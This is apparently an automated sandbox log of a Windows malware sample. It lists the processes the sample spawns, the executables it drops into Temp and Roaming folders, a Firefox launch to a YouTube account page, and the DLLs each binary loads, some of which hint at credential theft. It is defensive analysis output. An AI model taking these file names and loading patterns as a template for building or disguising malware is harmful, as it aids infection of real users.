Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2256 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fac9cc89-eaa9-45bc-9cd9-39fa408611c3} 7664 "\\.\pipe\gecko-crash-server-pipe.7664" 238e766c110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77cf4557-a063-4b0f-83a1-cb60c77939fe} 2116 "\\.\pipe\gecko-crash-server-pipe.2116" 28621a6eb10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: apphelp.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: winmm.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wininet.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: sspicli.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: uxtheme.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: mstask.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: windows.storage.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wldp.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: mpr.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: dui70.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: duser.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: chartv.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: oleacc.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: atlthunk.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: textinputframework.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: coremessaging.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: ntmarta.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wtsapi32.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: winsta.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: textshaping.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: propsys.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: explorerframe.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: iertutil.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: profapi.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: edputil.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: urlmon.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: srvcli.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: netutils.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: appresolver.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: bcp47langs.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: slc.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: userenv.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: sppc.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wininet.dll
